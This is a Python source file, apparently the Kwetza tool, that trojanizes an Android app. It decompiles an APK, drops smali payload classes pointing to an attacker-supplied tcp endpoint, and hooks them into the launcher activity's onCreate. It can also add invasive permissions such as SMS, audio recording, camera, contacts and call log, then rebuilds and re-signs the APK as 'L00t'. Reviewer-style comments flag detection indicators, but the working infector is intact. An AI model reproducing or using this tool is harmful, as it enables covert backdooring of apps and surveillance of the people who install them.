#!/usr/bin/pyton
import subprocess
import sys
import os
from bs4 import BeautifulSoup as Soup
# Module-level state shared between the steps below. Each step reads what an
# earlier one wrote, so they only work when run in the order used under
# __main__ (initialize -> byteTheComms -> parseAndroidManifext -> readPayloads
# -> injectIntoActivity -> injectCrazyPermissions -> buildAgain).
activityToTarget=""   # dotted name of the launcher activity chosen by parseAndroidManifext()
targetFolder=""       # apktool output directory of the decoded APK, set by initialize()
endpointIP=""         # sys.argv[2], set by initialize()
endpintPort=""        # sys.argv[3], set by initialize() (the misspelling is the real name; other functions use it as-is)
hexEndpoint=""        # per-character hex literals of the endpoint string, appended to by byteTheComms()
facepalm=""           # hex() of the endpoint string length, set by byteTheComms()
cwd=""                # os.getcwd() at the time initialize() ran
def byteTheComms():
    """Encode the endpoint string as smali-ready hex byte literals.

    Reads the globals endpointIP and endpintPort and writes the globals
    hexEndpoint and facepalm, which readPayloads() later substitutes into
    the payload template. Returns nothing.
    """
    print "[*] BYTING COMMS..."
    # The exact string that ends up inside the injected class, "ZZZZ" prefix included.
    totalEndpointPlain="ZZZZtcp://"+endpointIP+":"+endpintPort
    endpointLength=len(totalEndpointPlain)
    global facepalm
    # Length as a "0x.." string (hex() of an int).
    facepalm=hex(endpointLength)
    global hexEndpoint
    # One "0x.." literal per character, each followed by a newline and two
    # tabs. This appends to the existing global and never clears it, so the
    # value is only correct on the first call.
    # From an analyst's side: the endpoint is stored as plain ASCII byte
    # constants, so it is recoverable from the injected smali by decoding
    # these literals back to characters.
    for val in totalEndpointPlain:
        hexEndpoint+=hex(ord(val))+"\n\t\t"
def initialize():
    """Check for apktool, read the CLI arguments and decode the target APK.

    Expects sys.argv[1] = APK file name relative to the current directory,
    sys.argv[2] = endpoint IP, sys.argv[3] = endpoint port. Sets the globals
    endpointIP, endpintPort, cwd and targetFolder. Calls sys.exit() when the
    apktool version output does not contain "2.". Returns nothing.
    """
    print "[*] DECOMPILING TARGET APK"
    command = ["apktool", "--version"]
    # Only stdout is captured; stderr is inherited and never inspected.
    p = subprocess.Popen(command, stdout=subprocess.PIPE)
    theResult = p.communicate()[0]
    global endpintPort
    global endpointIP
    endpointIP=sys.argv[2]
    endpintPort=sys.argv[3]
    global cwd
    print "[+] ENDPOINT IP: "+endpointIP
    print "[+] ENDPOINT PORT: "+endpintPort
    #CHECK IF APKTOOL IS INSTALLED
    # Substring test on the version output, not a real version comparison:
    # any output containing "2." passes.
    if "2." not in theResult:
        print "[+] NO APKTOOL VERSION 2, PLEASE INSTALL APKTOOL 2 AND ADD TO PATH"
        sys.exit()
    cwd = os.getcwd()
    #NOW WE NEED TO DECOMPILE THE APPLICATION
    # Arguments are passed as a list (no shell), so sys.argv[1] is not
    # shell-interpreted; it is still used unvalidated as a path component.
    command = ["apktool", "d", ""+cwd+"/"+sys.argv[1]]
    p = subprocess.Popen(command, stdout=subprocess.PIPE)
    result = p.communicate()[0]
    # A decode failure is only reported, not acted on: the remaining steps
    # still run and will fail later when targetFolder does not exist. The
    # check looks only at stdout, and the process exit code is not examined.
    if "error" in result:
        print "[+] APKTOOL DECOMPILE ERROR: ",result
    else:
        print "[+] APKTOOL DECOMPILED SUCCESS"
    #NOW WE SET THE TARGET FOLDER
    # Presumably relies on apktool's default output directory (the APK name
    # with its extension stripped, under cwd) - TODO confirm. index() finds
    # the FIRST dot, so a name such as "my.app.apk" yields "my" rather than
    # "my.app", and it raises ValueError when the name has no dot at all.
    outputFolderName=sys.argv[1]
    intPoss=outputFolderName.index(".")
    global targetFolder
    targetFolder=cwd+"/"+outputFolderName[:intPoss]
def parseAndroidManifext():
    """Pick the launcher activity out of the decoded AndroidManifest.xml.

    Reads targetFolder/AndroidManifest.xml, scans activity-alias and
    activity elements for one whose serialized markup contains "LAUNCHER",
    and stores that element's android:targetActivity (alias) or
    android:name in the global activityToTarget. Returns nothing.
    """
    print "[*] ANALYZING ANDROID MANIFEST"
    global targetFolder
    file = targetFolder+"/AndroidManifest.xml"
    # The file object is never closed explicitly.
    handler = open(file).read()
    # NOTE(review): parsed with the "lxml" parser; the lower-case attribute
    # keys used below ("android:targetactivity") presumably rely on that
    # parser lower-casing attribute names - TODO confirm.
    soup = Soup(handler,"lxml")
    # Aliases are collected first, then plain activities.
    activities= soup.find_all('activity-alias')
    activities+=soup.find_all('activity')
    foundLAUNCHER=0
    for activity in activities:
        # Substring match on the element's whole markup (including its
        # intent-filter children), not a check of the category attribute itself.
        if "LAUNCHER" in str(activity):
            foundLAUNCHER=1
            global activityToTarget
            if "android:targetactivity" in str(activity).lower():
                activityToTarget= str(activity['android:targetactivity'])
            elif "android:name" in str(activity).lower():
                activityToTarget= str(activity['android:name'])
            else:
                print "[+] ERROR IDENTIFYING ACTIVITY"
            # No break here: when several elements match, the last one wins.
    if foundLAUNCHER==1:
        print "[+] TARGET ACTIVIY: "+activityToTarget
    else:
        print "[+] NO LAUNCHER FOUND!!!!!"
def readPayloads():
    """Fill in the two smali templates and write them into the target's package directory.

    Reads payload/AssistActivity1.smali and payload/AssistActivity.smali
    from cwd, replaces the PLACEHOLDER, FACEPALM and BEARDEDGREATNESS
    markers, and writes the results next to the target activity under
    targetFolder/smali. Depends on activityToTarget, facepalm and
    hexEndpoint having been set by the earlier steps. Returns nothing.
    """
    global cwd
    # The template files are not part of this page; their contents are only
    # known through the markers replaced below.
    pathToPalyoad1=cwd+"/"+"payload/AssistActivity1.smali"
    pathToPalyoad12=cwd+"/"+"payload/AssistActivity.smali"
    contentsOfFile1 = open(pathToPalyoad1).read()
    contentsOfFile2 = open(pathToPalyoad12).read()
    # Smali-style descriptor of the target activity ("L" + dotted name with
    # '/' separators); everything before the last '/' is its package path.
    inject="L"+activityToTarget.replace('.','/')
    intPackagePos=inject.rfind('/')
    preppedContents1= contentsOfFile1.replace('PLACEHOLDER',inject[:intPackagePos])
    preppedContents2= contentsOfFile2.replace('PLACEHOLDER',inject[:intPackagePos])
    #inject the tcp endpoint here
    # FACEPALM receives the hex length and BEARDEDGREATNESS the per-character
    # hex literals, both produced by byteTheComms().
    preppedContents2= preppedContents2.replace('FACEPALM',facepalm)
    preppedContents2= preppedContents2.replace('BEARDEDGREATNESS',hexEndpoint)
    # Directory that holds the target activity's .smali file.
    targetDirectory=targetFolder+"/smali/"+activityToTarget.replace('.','/')
    targetDirectory=targetDirectory[:targetDirectory.rfind('/')]
    # Two new classes are added inside the app's own package. When diffing a
    # rebuilt APK against the original, these extra files are a direct tell.
    assist1File = open(targetDirectory+"/AssistActivity1.smali", "w")
    assist1File.write(preppedContents1)
    assist1File.close()
    assist2File = open(targetDirectory+"/AssistActivity.smali", "w")
    assist2File.write(preppedContents2)
    assist2File.close()
    pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
    # Dead code: the contents read here are stored in a local that is never used.
    stringContentsOfTargetActivity=""
    stringContentsOfTargetActivity = open(pathToFile).read()
def injectIntoActivity():
    """Insert a call to the dropped AssistActivity into the target activity's smali.

    Reads targetFolder/smali/<activity>.smali and, after every line that
    contains both "create" and "method" (case-insensitive), appends an
    invoke-static of <package>/AssistActivity;->doThis(Landroid/content/Context;)V.
    The file is rewritten in place. Returns nothing.
    """
    print "[*] INJECTING INTO APK..."
    global targetFolder
    # Both substrings must occur on the same line. This is presumably aimed
    # at the ".method ... onCreate(...)" line, but it also matches any other
    # method whose name contains "create" - TODO confirm intended.
    checkStrings=['create','method']
    pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
    #NOW WE NEED TO INJECT THE CALLING CODE INTO THE TARGET ACTIVITY
    # p0 is the receiver register of an instance method, passed as the
    # Context argument. The fixed substring
    # "AssistActivity;->doThis(Landroid/content/Context;)V" is left in every
    # file this tool touches and is a straightforward signature for it.
    stringInvokePayload='\ninvoke-static {p0}, INJECT/AssistActivity;->doThis(Landroid/content/Context;)V\n'
    inject="L"+activityToTarget.replace('.','/')
    intPackagePos=inject.rfind('/')
    stringPackageToInject=inject[:intPackagePos]
    stringInvokePayload=stringInvokePayload.replace('INJECT',stringPackageToInject);
    f = open(pathToFile,'r')
    stringDataToWriteIntoNewActivity=""
    # Copy the file line by line, appending the call right after each matching line.
    for line in f.readlines():
        stringDataToWriteIntoNewActivity+=line
        if all(x in line.lower() for x in checkStrings):
            stringDataToWriteIntoNewActivity+=stringInvokePayload
    f.close()
    # Same path as computed above; recomputed rather than reused.
    pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
    newInjectFile = open(pathToFile, "w")
    newInjectFile.write(stringDataToWriteIntoNewActivity)
    newInjectFile.close()
def buildAgain():
    """Rebuild the modified tree with apktool and sign the result with jarsigner.

    Uses sys.argv[1] as the output APK name, targetFolder as the apktool
    project directory and cwd/payload/mykey.keystore as the signing key.
    Only stdout of each tool is captured and echoed; exit codes are not
    checked, so a failed build or signing step is not detected. Returns nothing.
    """
    print "[+] TIME TO BUILD INFECTED APK..."
    #name of the APK we are targeting
    stringNameOfAPK=sys.argv[1]
    #the path to our freshly built apk
    pathToNewApk=targetFolder+"/dist/"+stringNameOfAPK
    #the apktool command to rebuild our target app
    stringApkToolBuildCommand= ["apktool","b",targetFolder]
    #jarsigner command to sign our freshly built apk
    # Signs with a keystore shipped next to the script (not on this page)
    # under alias "alias_name", using MD5withRSA / SHA1 - both deprecated.
    # No -storepass/-keypass is supplied, so jarsigner presumably prompts.
    # Because the key is fixed, every APK produced with an unchanged keystore
    # carries the same signer certificate; its fingerprint is therefore a
    # usable triage indicator, and the output will never match the original
    # developer's signature.
    stringJarSignerCommand=["jarsigner", "-keystore", cwd+"/"+"payload/mykey.keystore", pathToNewApk, "alias_name", "-sigalg", "MD5withRSA", "-digestalg", "SHA1"]
    #time to execute the build command
    print "[*] EXECUTING APKTOOL BUILD COMMAND..."
    p = subprocess.Popen(stringApkToolBuildCommand, stdout=subprocess.PIPE)
    buildResult = p.communicate()[0]
    print "[+] BUILD RESULT"
    print "#####################################"
    print buildResult
    print "#####################################"
    #time to execute the jarsigner command
    print "[*] EXECUTING JARSIGNER COMMAND..."
    p = subprocess.Popen(stringJarSignerCommand, stdout=subprocess.PIPE)
    jarsignerResult = p.communicate()[0]
    print "[+] JARSIGNER RESULT"
    print "#####################################"
    print jarsignerResult
    print "#####################################"
    # Reported path is apktool's default "dist" output inside the project directory.
    print "\n[+] L00t located at "+targetFolder+"/dist/"+sys.argv[1]
def injectCrazyPermissions():
    """Optionally add a fixed block of uses-permission entries to the manifest.

    When sys.argv[4] contains "yes", the block below is inserted into
    targetFolder/AndroidManifest.xml immediately after the FIRST existing
    <uses-permission ...> line and the file is rewritten in place; if the
    manifest has no such line, nothing is inserted. Otherwise the manifest
    is left untouched. Raises IndexError when sys.argv[4] is absent
    (caught by the caller). Returns nothing.
    """
    print "[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED"
    if "yes" in sys.argv[4]:
        print "[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!"
        # Fixed text as written. Several artifacts make this block easy to
        # recognise in a modified manifest: "ACCESS_COURSE_LOCATION" is not a
        # real Android permission name, RECORD_AUDIO appears twice, and the
        # last entry is followed by a stray '"' that lands in the XML.
        stringCrazyPermissions='\n<uses-permission android:name="android.permission.INTERNET" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_PHONE_STATE" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.SEND_SMS" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECEIVE_SMS"/>'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECORD_AUDIO" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.CALL_PHONE" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_CONTACTS" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.WRITE_CONTACTS" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECORD_AUDIO" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.WRITE_SETTINGS" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.CAMERA" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_SMS" />'
        stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_CALL_LOG" />"\n'
        global targetFolder
        # Anchor: the first line that already declares a permission.
        checkString="<uses-permission android:name="
        pathToFile=targetFolder+"/AndroidManifest.xml"
        #NOW WE NEED TO INJECT THE ADDITIONAL PERMISSIONS INTO THE TARGET MANIFEST
        firstCheck=0;
        f = open(pathToFile,'r')
        stringDataToWriteIntoNewActivity=""
        for line in f.readlines():
            stringDataToWriteIntoNewActivity+=line
            if checkString.lower() in line.lower():
                # Insert once only, after the first match.
                if firstCheck==0:
                    stringDataToWriteIntoNewActivity+=stringCrazyPermissions
                    firstCheck=1
        f.close()
        newInjectFile = open(pathToFile, "w")
        newInjectFile.write(stringDataToWriteIntoNewActivity)
        newInjectFile.close()
    else:
        # Manifest left as-is; only the permissions the app already declares are available.
        print "[*] ABUSING LEGITIMATE PERMISSIONS"
if __name__ == "__main__":
    # Entry point. Positional arguments (none are validated up front):
    #   sys.argv[1]  APK file name relative to the current directory
    #   sys.argv[2]  endpoint IP
    #   sys.argv[3]  endpoint port
    #   sys.argv[4]  "yes" to also add the extra permissions block
    # Each step runs in order and shares state through the module globals;
    # any exception stops the run after printing its message. The script
    # uses Python 2 print statements throughout.
    print "[+] MMMMMMMM KWETZA";
    try:
        initialize()
    except Exception as e:
        print "!!!! ERROR IN 'initialize' method"
        print str(e)
        sys.exit()
    try:
        byteTheComms()
    except Exception as e:
        print "!!! ERROR IN 'byteTheComms' method"
        print str(e)
        sys.exit()
    try:
        parseAndroidManifext()
    except Exception as e:
        print "!!! ERROR IN 'parseAndroidManifext' method"
        print str(e)
        sys.exit()
    try:
        readPayloads()
    except Exception as e:
        print "!!! ERROR IN 'readPayloads' method"
        print str(e)
        sys.exit()
    try:
        injectIntoActivity()
    except Exception as e:
        print "!!! ERROR IN 'injectIntoActivity' method"
        print str(e)
        sys.exit()
    try:
        injectCrazyPermissions()
    except Exception as e:
        print "!!! ERROR IN 'injectCrazyPermissions' method"
        print str(e)
        sys.exit()
    try:
        buildAgain()
    except Exception as e:
        print "!!! ERROR IN 'buildAgain' method"
        print str(e)
        sys.exit()